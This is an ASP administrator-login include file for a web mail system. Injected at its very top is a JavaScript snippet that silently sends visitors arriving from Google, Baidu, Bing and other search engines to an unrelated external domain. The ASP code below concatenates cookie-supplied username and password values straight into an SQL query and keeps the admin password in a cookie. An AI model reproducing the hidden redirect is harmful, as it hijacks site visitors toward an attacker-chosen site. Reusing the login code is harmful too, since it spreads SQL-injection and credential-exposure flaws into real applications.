001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="const.asp"--> 002: <% 003: Dim Rs
004: Dim A_UserID '管理员ID
005: Dim A_UserName '管理员账户
006: Dim A_TrueName '管理员姓名
007:
008:
009: If InStr(Request.ServerVariables("Query_String"),"'")<>0 then
010: Netlog A_UserName,"非法地址访问。"
011: End If
012:
013: Call CheckAdminLogin()
014:
015: Sub CheckAdminLogin()
016: Dim AdminName,AdminPwd
017: AdminName=GetCookies("Admin","AdminName")
018: AdminPwd=GetCookies("Admin","AdminPassword")
019: IF AdminName="" Then
020: alert "登陆超时或您还没有登陆,请重新登陆","./mail_login.asp"
021: End If
022: If not CheckName(AdminName) or not CheckPassword(AdminPwd) then
023: Response.redirect"mail_login.asp"
024: Response.end
025: End If
026: Set rs=conn.execute("Select ID,username,TrueName From [vn_manager] where username='"& AdminName &"' and [password]='"& AdminPwd &"'")
027: If rs.eof then
028: Response.redirect"mail_login.asp"
029: Response.End
030: Else
031: A_UserID=rs("ID")
032: A_UserName=rs("username")
033: A_TrueName=rs("TrueName")
034: End If
035: rs.close : Set rs=Nothing
036: End Sub
037:
038: Sub CheckString(Flag)
039:
040: End Sub
041:
042: %>
043:
044: